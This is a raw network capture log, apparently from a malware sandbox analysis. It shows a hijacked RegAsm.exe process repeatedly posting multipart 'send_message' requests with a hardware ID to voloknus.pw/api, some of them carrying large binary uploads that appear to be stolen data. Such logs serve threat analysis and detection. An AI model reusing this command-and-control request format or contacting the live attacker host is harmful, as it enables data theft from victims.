Nov 7, 2023 15:21:25.508949995 CET	83	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:25.973602057 CET	89	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=ql2kt3otvc4pvj3lrnlanaa6mi; expires=Sat, 02 Mar 2024 08:08:04 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:25 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K4coJan1NtSEZMxN19VuAkCi5%2FC%2BK3%2BayfBwQrggkSChvj3Je09eotkks%2BP%2B3TvTmaAjezd2xNtTnPVI3TWeBGyzvaWtGNhGZ8919M46vdMqGc9uss4kRyRJAmbr2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638fafe2beb7b-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:25.973664045 CET	89	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.8	49730	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:26.166460991 CET	94	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:26.167004108 CET	94	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:26.693097115 CET	123	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=a95h41f7c6a2i3l369fpbv9ojg; expires=Sat, 02 Mar 2024 08:08:05 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:26 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1Vj1iHE6hV2isi8UNf%2BSeuyXx0Y4O1opvbBVXhJBj4zQppWzAYW6IQXMTp5FSJXW2tBdlOHgcKGgWe6YmBenfaOnBLyTJqEHxqCU1NbBQamtZSk1uSZRpmkhlptW7Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822638ff19222763-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:26.693165064 CET	123	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.8	49731	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:27.193608046 CET	124	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 19106 Host: voloknus.pw
Nov 7, 2023 15:21:27.194586039 CET	135	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:27.345870018 CET	136	OUT	Data Raw: 91 dc a6 c3 c9 0e 96 dc b6 a7 e9 26 2f be e7 07 d6 2e 89 62 96 c2 bc 7b 3c 3f d8 26 51 3f f2 83 24 e6 af dc dc ba d2 de b9 d0 68 fd d2 fd b2 2d 31 b4 54 03 5a 96 3e de 4b 77 9a 38 61 e0 f9 51 6f b4 53 30 b3 03 05 1d 4f 4e dd bf 74 9e 6b dd bf 5f Data Ascii: &/.b{<?&Q?$h-1TZ>Kw8aQoS0ONtk_3Du'l:=TND\]id~t>=/dm<Oz/vXbDEk%!p4fH t'T,4T"o\|gv[jwWeU/ck='r;mL
Nov 7, 2023 15:21:27.346822023 CET	143	OUT	Data Raw: 01 4e 37 5e 79 3e e9 ba d3 eb e2 fb 37 c6 5a be be 79 75 e3 7d fe c7 cd 83 df da 2c 49 63 85 a5 31 de 0e 49 5b 24 97 0a bd ce 27 d3 fe f8 fc 45 ae 65 9a d5 6f 3d ca ef 62 2b de be 98 0b 5d 2f de d1 36 b3 05 8a 95 66 da da a3 4d 9a 19 7b b0 a7 9b Data Ascii: N7^y>7Zyu},Ic1I[$'Eeo=b+]/6fM{62~5ujD]kW3~%23*,Jwcw#mBJS;4'k-<rbf\o6Zsq.+<^&jJJer\:^v7tvOUb_7'i&={Q8[yvEd
Nov 7, 2023 15:21:27.933521986 CET	144	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=502pp82hhvan64sakn0994ho9l; expires=Sat, 02 Mar 2024 08:08:06 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:27 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qCwmwLIsM6grI3vE6DkCITRI4uqaL0pZ0EEjOmyY15mwi9i2Lo%2Fw5m%2FryBdXIyRUQaw1jNgcfxJI5Q8LQIbhHnVYZh6sTCxzaj932iqGSKvnPixtn%2B89PFerM7Ev4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 82263905889dc39b-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:27.933543921 CET	144	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.8	49732	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:28.132359982 CET	145	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:28.133181095 CET	146	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:28.599993944 CET	147	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=mthk637cegaquqhns4tku2m8n8; expires=Sat, 02 Mar 2024 08:08:07 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:28 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bjObUlu1lbBrbN3q3LWcVR0z76A7ALepDBC5Xcqk25a40yR8%2B7cFATeeoFJda%2F0uWs6RrrtIDJOHkoFoElxtTE5OI02YvhgVV6I289Z4jQX%2BK6sunw3l0XfdnODhDw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226390b6c4b27a7-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:28.600016117 CET	147	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.8	49733	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:28.789391994 CET	148	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:28.797321081 CET	148	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:29.323904037 CET	150	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=lbbq409q5gpak7t3pfe1icg58r; expires=Sat, 02 Mar 2024 08:08:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=z2P4gYJyQd3qat0LKgMtQI1WyeV1olhUeQgk3wVLB4zwQFWEExeG5J0VixHrCgWDU%2B51aFcHqQwvzYiJEy9oECe62gYUDcJ9t4%2FsHrcbNbW4pfbTDfhXTL8LRvJmfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226390f78266822-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:29.323923111 CET	150	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.8	49734	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:29.513956070 CET	150	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:29.514621973 CET	151	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:30.051071882 CET	152	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=elnr52slh3vumdeppok24322gt; expires=Sat, 02 Mar 2024 08:08:08 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:29 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RZuDjh9qU0zGJm1QvXUJZ7IqIcGw3qh2bxSiCg3qLrH88Fx6AU%2F%2FNkIJOSSWZvlKlM%2BWbc46GBiK4xnjeqvZQStVE6V5A8XUCgvINcF%2BB%2BSeNkkx4UURJ1Rw0OM79w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226391408eac3df-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:30.051114082 CET	152	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.8	49735	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:30.238367081 CET	153	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:30.239078999 CET	153	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:30.751826048 CET	155	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=6a71027kqqo1q3rsi53mlbd9nk; expires=Sat, 02 Mar 2024 08:08:09 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:30 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TZSjsI6NkzQJcJZQ36tzXlLGlUP%2BO%2FSrTlWY%2B7TcvPmbmujkojQtA%2Foc0O2xfSnhGMdO7%2FeIVavRt9Dvmjx2XPiP2nhxI03WgLGcXdh4DkjwFYecLMN7TVY%2Bc%2FR57Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 822639188d222808-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:30.751857042 CET	155	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.8	49736	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:30.950609922 CET	155	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
Nov 7, 2023 15:21:30.951231956 CET	156	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:31.413471937 CET	157	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=mocb7pkc6rnlufcls56cd42081; expires=Sat, 02 Mar 2024 08:08:10 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:31 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1pDCMwxkdmGeMTHbB9AqV0H%2FC%2BAcu4uK3Jnp%2BgegAIh%2FJhEPMGMuNNk6MGo05IDcUWvtL9MCodjugJ8avo%2FGhWlfLrYThU4FCtZY0308Pr5gS4g2%2FbcsoyCSKwmvZw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226391d0b8f2810-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:31.413496017 CET	157	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.8	49737	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:31.782855988 CET	158	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 20267 Host: voloknus.pw
Nov 7, 2023 15:21:31.783643961 CET	169	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"608E795768A2223BEA099D4A5F2825A110C27B28--SqDe87817huf871793q74Content-Disposition
Nov 7, 2023 15:21:31.935100079 CET	171	OUT	Data Raw: f6 89 de be b1 bd 5e 3b ca 76 d2 8e 1b 7c 99 d9 6f 2f d9 69 bc b5 91 bc 9e 8d 3e 30 ef ea 5e 70 56 4a c7 cf 9f d6 fc ae bb cf db 89 c3 fd 4e 76 73 a1 8d 8d c6 39 f2 5d 77 f4 fc 50 7b 9c b3 1b db ef 33 bb d9 7e 4d 6f 39 b5 ab d3 fa f2 60 b4 65 ea Data Ascii: ^;v\|o/i>0^pVJNvs9]wP{3~Mo9`e\KGZP2ol}fbfphVbc[s'qZV@l~MNDEmjic?7OGwJ;6t~}F~cc]OPJ&
Nov 7, 2023 15:21:31.935739994 CET	174	OUT	Data Raw: a7 82 f0 5b e1 ef 87 5f 08 ff 7d f8 5a 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9f 9c db 52 07 12 b3 b5 ea c1 42 b9 5c ba 5a 9d 3f 78 f9 f2 e5 83 99 5e 91 03 bd 22 d3 bd 22 53 ef 4f 1d 5d Data Ascii: [_}ZRB\Z?x^""SO]Ul#ONetj(1!Pv8L~?n77xoH%wdlb >C*
Nov 7, 2023 15:21:31.935755968 CET	178	OUT	Data Raw: 00 00 00 00 00 00 00 60 5b 1b 0e 3f 17 a4 c2 57 82 f0 95 f0 57 c3 ff 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 4f dc 1d a9 07 12 d5 5a 69 b6 54 c9 cf d4 8a 53 c5 ca d4 95 fc 54 b5 59 69 24 Data Ascii: `[?WWOZiTSTYi$GSG6\|H%_/6b=uHq)mm8>,
Nov 7, 2023 15:21:32.534883022 CET	180	IN	HTTP/1.1 200 OK Date: Tue, 07 Nov 2023 14:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Set-Cookie: PHPSESSID=uarcinor1itn65cqs5sdkjpl3l; expires=Sat, 02 Mar 2024 08:08:11 GMT; Max-Age=9999999; path=/ Set-Cookie: xdober_setting_show_country=1; expires=Sat, 06 Jan 2024 14:21:32 GMT; Max-Age=5184000; path=/ Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=J1J6vKb06sv2ykq%2FtbcS13XNdHO3vkq8SUPtimy7kr6Bu%2FLPuTI47M0EBkfWAMWyWWUdtP8wmp24WW05ruBl8PEsYKWYe%2Fr7PckR1SYBCJHgWUzwPrl7RXYtSHqgGQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8226392238833069-SEA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Nov 7, 2023 15:21:32.534909964 CET	180	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.8	49709	104.21.84.113	80	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	kBytes transferred	Direction	Data
Nov 7, 2023 15:21:11.495646954 CET	20	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Length: 533 Host: voloknus.pw
